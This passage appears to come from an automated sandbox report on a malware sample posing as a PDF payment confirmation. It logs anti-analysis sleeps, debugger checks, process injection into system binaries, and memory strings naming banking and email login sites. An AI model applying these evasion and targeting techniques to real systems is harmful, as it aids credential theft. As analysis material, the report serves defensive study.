                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: cQwRvD.exe PID: 8128, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeMemory allocated: 1390000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeMemory allocated: 3100000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeMemory allocated: 2F30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeMemory allocated: 90F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeMemory allocated: A0F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeMemory allocated: A2F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeMemory allocated: B2F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeMemory allocated: 1770000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeMemory allocated: 3160000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeMemory allocated: 5160000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeMemory allocated: 9350000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeMemory allocated: 79F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeMemory allocated: A350000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeMemory allocated: B350000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0146096E rdtsc 10_2_0146096E
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2978Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2477Jump to behavior
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeWindow / User API: threadDelayed 9840
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.8 %
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.2 %
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe TID: 7472Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8088Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8040Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8008Thread sleep count: 2477 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8084Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exe TID: 1352Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 6808Thread sleep count: 133 > 30
                      Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 6808Thread sleep time: -266000s >= -30000s
                      Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 6808Thread sleep count: 9840 > 30
                      Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 6808Thread sleep time: -19680000s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: sdiagnhost.exe, 00000013.00000002.2568400764.00000000077D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CDYNVMware20,11696492231p
                      Source: I130O15.19.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                      Source: I130O15.19.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                      Source: I130O15.19.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                      Source: I130O15.19.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                      Source: I130O15.19.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                      Source: I130O15.19.drBinary or memory string: outlook.office.comVMware20,11696492231s
                      Source: I130O15.19.drBinary or memory string: AMC password management pageVMware20,11696492231
                      Source: I130O15.19.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                      Source: sdiagnhost.exe, 00000013.00000002.2568400764.00000000077D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rdVMware20,11696492231x
                      Source: I130O15.19.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                      Source: I130O15.19.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                      Source: sdiagnhost.exe, 00000013.00000002.2568400764.00000000077D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696492231
                      Source: I130O15.19.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                      Source: I130O15.19.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                      Source: I130O15.19.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                      Source: I130O15.19.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                      Source: I130O15.19.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                      Source: I130O15.19.drBinary or memory string: discord.comVMware20,11696492231f
                      Source: sdiagnhost.exe, 00000013.00000002.2568400764.00000000077D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,1169649223x
                      Source: sdiagnhost.exe, 00000013.00000002.2549013869.0000000000907000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: mYtMtAAMpAtCOL.exe, 00000014.00000002.2560817786.00000000014B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
                      Source: sdiagnhost.exe, 00000013.00000002.2568400764.00000000077D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware
                      Source: sdiagnhost.exe, 00000013.00000002.2568400764.00000000077D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231~
                      Source: cQwRvD.exe, 0000000B.00000002.1596998361.000000000778E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _NECVMWar&Prod_VMware_SA
                      Source: I130O15.19.drBinary or memory string: global block list test formVMware20,11696492231
                      Source: I130O15.19.drBinary or memory string: dev.azure.comVMware20,11696492231j
                      Source: I130O15.19.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                      Source: I130O15.19.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                      Source: I130O15.19.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                      Source: sdiagnhost.exe, 00000013.00000002.2568400764.00000000077D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,1
                      Source: sdiagnhost.exe, 00000013.00000002.2568400764.00000000077D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tVMware20,11696492231
                      Source: I130O15.19.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                      Source: sdiagnhost.exe, 00000013.00000002.2568400764.00000000077D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kers - non-EU EuropeVMware20,11696492231
                      Source: I130O15.19.drBinary or memory string: tasks.office.comVMware20,11696492231o
                      Source: sdiagnhost.exe, 00000013.00000002.2568400764.00000000077D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: active Brokers - EU WestVMware20,1169649
                      Source: sdiagnhost.exe, 00000013.00000002.2568400764.00000000077D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: East & CentralVMware20,116964922O
                      Source: I130O15.19.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                      Source: I130O15.19.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                      Source: sdiagnhost.exe, 00000013.00000002.2568400764.00000000077D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231"
                      Source: I130O15.19.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                      Source: I130O15.19.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                      Source: I130O15.19.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                      Source: I130O15.19.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                      Source: I130O15.19.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                      Source: firefox.exe, 00000016.00000002.1960517438.000001E6E71FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlljj
                      Source: I130O15.19.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess queried: DebugPort
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0146096E rdtsc 10_2_0146096E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00417AC3 LdrLoadDll,10_2_00417AC3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014B4144 mov eax, dword ptr fs:[00000030h]10_2_014B4144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014B4144 mov eax, dword ptr fs:[00000030h]10_2_014B4144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014B4144 mov ecx, dword ptr fs:[00000030h]10_2_014B4144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014B4144 mov eax, dword ptr fs:[00000030h]10_2_014B4144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014B4144 mov eax, dword ptr fs:[00000030h]10_2_014B4144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014B8158 mov eax, dword ptr fs:[00000030h]10_2_014B8158
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01426154 mov eax, dword ptr fs:[00000030h]10_2_01426154
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01426154 mov eax, dword ptr fs:[00000030h]10_2_01426154
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0141C156 mov eax, dword ptr fs:[00000030h]10_2_0141C156
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014CE10E mov eax, dword ptr fs:[00000030h]10_2_014CE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014CE10E mov ecx, dword ptr fs:[00000030h]10_2_014CE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014CE10E mov eax, dword ptr fs:[00000030h]10_2_014CE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014CE10E mov eax, dword ptr fs:[00000030h]10_2_014CE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014CE10E mov ecx, dword ptr fs:[00000030h]10_2_014CE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014CE10E mov eax, dword ptr fs:[00000030h]10_2_014CE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014CE10E mov eax, dword ptr fs:[00000030h]10_2_014CE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014CE10E mov ecx, dword ptr fs:[00000030h]10_2_014CE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014CE10E mov eax, dword ptr fs:[00000030h]10_2_014CE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014CE10E mov ecx, dword ptr fs:[00000030h]10_2_014CE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014CA118 mov ecx, dword ptr fs:[00000030h]10_2_014CA118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014CA118 mov eax, dword ptr fs:[00000030h]10_2_014CA118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014CA118 mov eax, dword ptr fs:[00000030h]10_2_014CA118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014CA118 mov eax, dword ptr fs:[00000030h]10_2_014CA118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014E0115 mov eax, dword ptr fs:[00000030h]10_2_014E0115
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01450124 mov eax, dword ptr fs:[00000030h]10_2_01450124
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014E61C3 mov eax, dword ptr fs:[00000030h]10_2_014E61C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014E61C3 mov eax, dword ptr fs:[00000030h]10_2_014E61C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0149E1D0 mov eax, dword ptr fs:[00000030h]10_2_0149E1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0149E1D0 mov eax, dword ptr fs:[00000030h]10_2_0149E1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0149E1D0 mov ecx, dword ptr fs:[00000030h]10_2_0149E1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0149E1D0 mov eax, dword ptr fs:[00000030h]10_2_0149E1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0149E1D0 mov eax, dword ptr fs:[00000030h]10_2_0149E1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014F61E5 mov eax, dword ptr fs:[00000030h]10_2_014F61E5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014501F8 mov eax, dword ptr fs:[00000030h]10_2_014501F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01460185 mov eax, dword ptr fs:[00000030h]10_2_01460185
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014DC188 mov eax, dword ptr fs:[00000030h]10_2_014DC188
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014DC188 mov eax, dword ptr fs:[00000030h]10_2_014DC188
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014C4180 mov eax, dword ptr fs:[00000030h]10_2_014C4180
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014C4180 mov eax, dword ptr fs:[00000030h]10_2_014C4180
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A019F mov eax, dword ptr fs:[00000030h]10_2_014A019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A019F mov eax, dword ptr fs:[00000030h]10_2_014A019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A019F mov eax, dword ptr fs:[00000030h]10_2_014A019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A019F mov eax, dword ptr fs:[00000030h]10_2_014A019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0141A197 mov eax, dword ptr fs:[00000030h]10_2_0141A197
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0141A197 mov eax, dword ptr fs:[00000030h]10_2_0141A197
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0141A197 mov eax, dword ptr fs:[00000030h]10_2_0141A197
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01422050 mov eax, dword ptr fs:[00000030h]10_2_01422050
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A6050 mov eax, dword ptr fs:[00000030h]10_2_014A6050
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144C073 mov eax, dword ptr fs:[00000030h]10_2_0144C073
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A4000 mov ecx, dword ptr fs:[00000030h]10_2_014A4000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014C2000 mov eax, dword ptr fs:[00000030h]10_2_014C2000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014C2000 mov eax, dword ptr fs:[00000030h]10_2_014C2000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014C2000 mov eax, dword ptr fs:[00000030h]10_2_014C2000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014C2000 mov eax, dword ptr fs:[00000030h]10_2_014C2000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014C2000 mov eax, dword ptr fs:[00000030h]10_2_014C2000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014C2000 mov eax, dword ptr fs:[00000030h]10_2_014C2000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014C2000 mov eax, dword ptr fs:[00000030h]10_2_014C2000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014C2000 mov eax, dword ptr fs:[00000030h]10_2_014C2000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143E016 mov eax, dword ptr fs:[00000030h]10_2_0143E016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143E016 mov eax, dword ptr fs:[00000030h]10_2_0143E016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143E016 mov eax, dword ptr fs:[00000030h]10_2_0143E016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143E016 mov eax, dword ptr fs:[00000030h]10_2_0143E016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0141A020 mov eax, dword ptr fs:[00000030h]10_2_0141A020
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0141C020 mov eax, dword ptr fs:[00000030h]10_2_0141C020
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014B6030 mov eax, dword ptr fs:[00000030h]10_2_014B6030
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A20DE mov eax, dword ptr fs:[00000030h]10_2_014A20DE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0141A0E3 mov ecx, dword ptr fs:[00000030h]10_2_0141A0E3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A60E0 mov eax, dword ptr fs:[00000030h]10_2_014A60E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014280E9 mov eax, dword ptr fs:[00000030h]10_2_014280E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0141C0F0 mov eax, dword ptr fs:[00000030h]10_2_0141C0F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014620F0 mov ecx, dword ptr fs:[00000030h]10_2_014620F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142208A mov eax, dword ptr fs:[00000030h]10_2_0142208A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014B80A8 mov eax, dword ptr fs:[00000030h]10_2_014B80A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014E60B8 mov eax, dword ptr fs:[00000030h]10_2_014E60B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014E60B8 mov ecx, dword ptr fs:[00000030h]10_2_014E60B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]10_2_014A2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]10_2_014A2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]10_2_014A2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]10_2_014A2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]10_2_014A2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]10_2_014A2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]10_2_014A2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]10_2_014A2349
